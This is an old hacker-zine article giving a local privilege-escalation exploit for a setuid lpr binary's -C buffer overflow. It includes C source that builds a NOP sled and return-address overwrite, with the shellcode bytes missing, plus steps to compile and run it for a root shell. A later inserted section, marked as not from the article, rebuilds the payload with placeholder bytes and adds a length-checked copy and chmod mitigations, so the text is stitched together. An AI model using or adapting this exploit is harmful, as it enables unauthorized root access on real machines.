10001: lpr Exploit

By: r3v

In this issue I'm gonna cover some basics of getting started hax0ring: Linux buffer overflows. (If you read previous issues of DD you'll know Cain gave a buffer overflow in an earlier article.) Buffer overflows are basically the most common type of exploit. I'm assuming you know *nix basics like ls and cp, and that you know what an exploit is.

The exploit I'm giving you this month is an lpr exploit. lpr is installed setuid root so that ordinary users can print, and the old version doesn't check the length of the -C (job class) argument before copying it into a fixed-size stack buffer. The exploit hands it an oversized -C argument built from NOPs, shellcode and a guessed return address, so lpr's own saved return address gets overwritten and execution lands in the shellcode with root privileges. If the box hasn't been reconfigured, that gives you root. W00P! So this is a pretty good one. I'll tell you how to compile it, and how to keep it from happening on your box if you run Linux.

(A note to the several people who actually read this: buffer overflows are _seriously_ hard to write. You have to be proficient in C, and you also need to understand how the stack is laid out and enough assembly to write the shellcode and place it.)

(NOTE: I DID NOT WRITE THIS. I got it from some webpage.)
---------------------CUT HERE--------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen */
#include <unistd.h>   /* execl */

#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 1023

/* returns the current stack pointer; the exploit guesses that the
   NOP sled will sit near this address inside lpr's stack frame */
long get_esp(void)
{
   __asm__("movl %esp,%eax");
}

int main(void)
{
   /* The shellcode bytes were lost from this copy of the article (the
      page shows "image not found" where the declaration stood); the
      original carried a Linux/x86 execve("/bin/sh") string here.
      Left empty rather than guessed. */
   char execshell[] = "";
   char buff[BUFFER_SIZE + 2 * sizeof(long) + 1];
   char *ptr;
   long *addr_ptr;
   int i;

   ptr = buff;
   /* NOP sled (0x90) fills everything in front of the shellcode */
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   /* two copies of the guessed return address; these land on lpr's
      saved return address, so control goes into the sled and slides
      down into the shellcode */
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   /* the oversized string goes in through lpr's -C (job class) option */
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
   return 1;   /* only reached if execl itself fails */
}
------------------------END CUT HERE----------------------------

Now here's what ya do. Save this as whatever; for demonstration purposes I'll call it "lprsploit.c". Then in your shell (I'm using my box for demonstrative purposes again) type this:

Erebus:~$ gcc -o owned lprsploit.c

That should compile it. After it's compiled, run it from the directory you built it in (./ because . is not in your PATH):

Erebus:~$ ./owned

If the box is still running the vulnerable lpr with the setuid bit on, it should drop you here:

bash#

WOOP! now you're root! If instead lpr just complains or the thing segfaults, either the return-address guess is off for that box (DEFAULT_OFFSET is the knob to turn) or the lpr has been fixed.

Ok... now for those of you who want to secure this, type this as root:
chmod -s /usr/bin/lpr

That removes the setuid-root bit, so even if the overflow still works the shell it spawns is just you. Next type this:
chmod og-rx /usr/bin/lpr

so then only root will be able to run it, and print. To check you got it, type:
ls -l /usr/bin/lpr

and make sure there's no 's' in the permission string.

That was the quick fix. The long-term fix is an lpr that checks the length of the -C argument (and anything else it copies into a fixed buffer) before copying it. That patch is too long to print here. Look around for it.
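Here is an added example, not code from this article or from lpr itself, that ties the two halves together: it builds the -C argument with the same layout as lprsploit.c above, then shows the bounds check the long-term fix needs. The shellcode is replaced by four 0xCC bytes, the stack address 0xbffff5c0 and the 31-byte class limit (CLASS_MAX) are assumptions, and the return address is 32 bits wide because the target is 32-bit Linux.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Argument layout the exploit builds for lpr -C:
 *   [ NOP sled 0x90 ... ][ shellcode ][ ret ][ ret ][ NUL ]
 * BUFFER_SIZE and DEFAULT_OFFSET are the exploit's own constants;
 * CLASS_MAX is an assumed size for lpr's class-name buffer. */
#define BUFFER_SIZE    1023
#define DEFAULT_OFFSET 50
#define CLASS_MAX      31

/* Stand-in for the shellcode: 0xCC is the x86 int3 opcode, used here
 * only so the bytes are easy to spot in a debugger; a real payload
 * would be an execve("/bin/sh") stub. */
static const unsigned char fake_shellcode[] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Build the -C argument into out[] the way lprsploit.c does and return
 * its length (without the NUL). ret is the guessed address of the sled
 * (get_esp()+DEFAULT_OFFSET in the exploit), passed in so the result is
 * deterministic. Because lpr copies the string with strcpy, no byte of
 * the sled, shellcode or address may be zero or the copy stops early. */
size_t build_lpr_payload(char *out, size_t outlen, const unsigned char *sc,
                         size_t sclen, uint32_t ret)
{
    size_t need = BUFFER_SIZE + 2 * sizeof ret + 1;
    char *p = out;
    int i;

    if (outlen < need || sclen > BUFFER_SIZE)
        return 0;

    /* 1. NOP sled: a jump landing anywhere here slides into the code */
    memset(p, 0x90, BUFFER_SIZE - sclen);
    p += BUFFER_SIZE - sclen;

    /* 2. shellcode, ending exactly at byte BUFFER_SIZE */
    memcpy(p, sc, sclen);
    p += sclen;

    /* 3. two copies of the guessed return address; these are what land
     *    on the saved return address of the lpr function that copied
     *    the -C argument into its fixed stack buffer */
    for (i = 0; i < 2; i++) {
        memcpy(p, &ret, sizeof ret);   /* memcpy: no alignment assumption */
        p += sizeof ret;
    }
    *p = '\0';
    return (size_t)(p - out);
}

/* The pattern the exploit relies on, in the vulnerable lpr:
 *
 *     char class[CLASS_MAX + 1];
 *     strcpy(class, optarg);          (optarg is the -C argument)
 *
 * Hardened form: refuse anything that does not fit, NUL included.
 * Returns 1 and fills dst on success, 0 (dst emptied) otherwise. */
int set_class_checked(char *dst, size_t dstlen, const char *arg)
{
    size_t n = strlen(arg);

    if (dstlen == 0)
        return 0;
    if (n >= dstlen) {
        dst[0] = '\0';
        return 0;
    }
    memcpy(dst, arg, n + 1);
    return 1;
}

int main(void)
{
    static char payload[BUFFER_SIZE + 2 * sizeof(uint32_t) + 1];
    char cls[CLASS_MAX + 1];
    size_t n;

    /* 0xbffff5c0 is an assumed stack address, typical of 32-bit Linux
     * of the period, not a value taken from the article */
    n = build_lpr_payload(payload, sizeof payload, fake_shellcode,
                          sizeof fake_shellcode, 0xbffff5c0u + DEFAULT_OFFSET);
    printf("payload: %zu bytes, strlen %zu (must match or strcpy truncates)\n",
           n, strlen(payload));
    printf("checked copy of payload: %s\n",
           set_class_checked(cls, sizeof cls, payload) ? "accepted" : "rejected");
    printf("checked copy of \"secret\": %s -> \"%s\"\n",
           set_class_checked(cls, sizeof cls, "secret") ? "accepted" : "rejected",
           cls);
    return 0;
}
```

The strlen check in main is the practical caveat behind the exploit's `get_esp() + DEFAULT_OFFSET` guess: a return address that contains a zero byte would be cut off by lpr's strcpy before the overwrite is complete, so the offset has to be chosen so that every byte of the address is non-zero as well as pointing into the sled.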

Well that's it for this month kiddies. C-ya around and don't get arrested.

By the way, I'm reminded... gimme some feedback on this shit ok? r3v@multic.ml.org or r3v_ball@whoever.com k?

